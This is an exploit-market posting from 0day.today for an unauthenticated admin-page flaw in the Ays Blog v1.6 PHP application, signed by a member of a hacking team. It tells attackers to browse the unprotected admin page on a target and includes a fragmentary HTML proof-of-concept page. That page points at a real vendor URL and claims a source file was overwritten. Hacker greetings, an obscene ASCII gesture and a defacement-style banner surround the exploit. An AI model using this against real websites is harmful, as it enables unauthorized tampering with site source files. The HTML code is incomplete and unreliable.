[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ays Blog v1.6 => Remote File Update Vulnerability

Author
KnocKout
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15741
Category
web applications
Date add
31-03-2011
Platform
php
Ays Blog v1.6 => Remote File Update Vulnerability
-----------------------------------------------------------
                       I KnocKout MEMBER FROM Inj3ct0r Team
                       1337 DAY ..
                       
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[E-Mail] : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon, BARCOD3
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Ays Blog
|~Price :  FREE
|~Version :  v1.6 
|~Software: http://phpexplorer.com/goster/1219
|Official : http://marmaradata.net/
|~Vulnerability Style : Remote File Source code Update
Google Dork :©Kerim YILMAZ. All right reserved.
###########################################################
Tested on: Localhost and Official Web

Not Security of Admin Panel 

###############################################################
For Manual Exploitable.
go to http://TARGET/yonet/sayfalar.php
------------------------

Basic HTML PoC Exploit.Html

<title>Ays Blog- Remote (2.php) Source Update Exploit</title>
</head>
			<td width="123" height="23"><a href="http://marmaradata.net/sss/yonet/sayfalar.php">Possible Update Files</a></td>
			<td rowspan="3"><b>Ays Blog- Remote (2.php) Source Update Exploit</b></td>
		</tr>
	
-----------
		Exploit Succesfily Successful. go to Updated File http://marmaradata.net/sss/sayfalar/2.php



FOR EXPLOIT-DB LAMERS 

............../'' )
...........,/¯../
........../..../
.../´¯/'...'/´¯¯`•¸
./'/.../..../......./¨¯ \
('(...´...´.... ¯~/'...' )
.\.................'..... /
..'\'...\.......... _.•´
....\..............(
.....\........ 

------------------------------------------------

                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 
                    WAS HERE.
                    
                     Tayfa Yatar.



#  0day.today [2024-09-29]  #